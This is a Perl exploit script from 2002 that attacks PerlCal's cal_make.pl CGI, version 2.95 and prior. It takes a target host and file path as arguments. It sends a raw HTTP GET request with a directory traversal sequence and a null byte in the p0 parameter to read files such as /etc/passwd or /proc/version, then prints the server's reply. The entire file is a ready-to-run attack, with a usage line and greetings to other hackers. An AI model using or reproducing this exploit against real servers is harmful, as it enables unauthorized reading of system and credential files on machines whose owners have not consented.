#!/usr/bin/perl
# PerlCal cal_make.pl directory traversal 
# this vuln was found by: Stan a.k.a. ThePike
#
# Vulnerable systems:
# PerlCal version 2.95 and prior (UNIX)
# 
# Written by badpack3t <badpack3t@security-protocols.com>
# For Security-Protocols Research Labs
# 09/09/02
#
# usage: 
# perl sp-perlcal.pl targeted_host /etc/passwd or /proc/version .. 
# 
# shoutouts:
#
# regulate, djdreadat420club, St0iC HaCkS, IreEnigma, stripey,
# dvdman, cr0wn, duu, ac1djazz, and whoever else...
# 
################

use IO::Socket;
use strict;

print "-"x74;
print "\nPerlCal cal_make.pl directory traversal, badpack3t\@security-protocols.com\n";
print "-"x74;
print "\n\n";

my $host   = $ARGV[0];
my $port   = 80;
my $fuxor  = "/etc/passwd%00";
my $lin;
my @thedata;

($ARGV[1]) && ($fuxor  = $ARGV[1]."%00");

print "w0rking on getting $fuxor from $host\n";

my $tcpval = getprotobyname('tcp');
my $serverIP = inet_aton($host);
my $serverAddr = sockaddr_in(80, $serverIP);
my $protocol_name = "tcp";

my $iaddr  = inet_aton($host) 		   || die print("host was not found: $host");
my $paddr  = sockaddr_in($port, $iaddr)    || die print("you did something wrong stupid... exiting...");
my $proto  = getprotobyname('tcp')         || die print("cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die print("socket could not open: $!");
connect(SOCK, $paddr) 			   || die print("cannot connect: $!");

my $submit = "GET /cgi-bin/cal_make.pl?p0=../../../../../../../../../../../..$fuxor\n\n";   
send(SOCK,$submit,0);
@thedata=<SOCK>;

close (SOCK);

foreach $lin(@thedata) 
{
	print "$lin";
}

print "\n-----------------------------------EOF------------------------------------\n\n";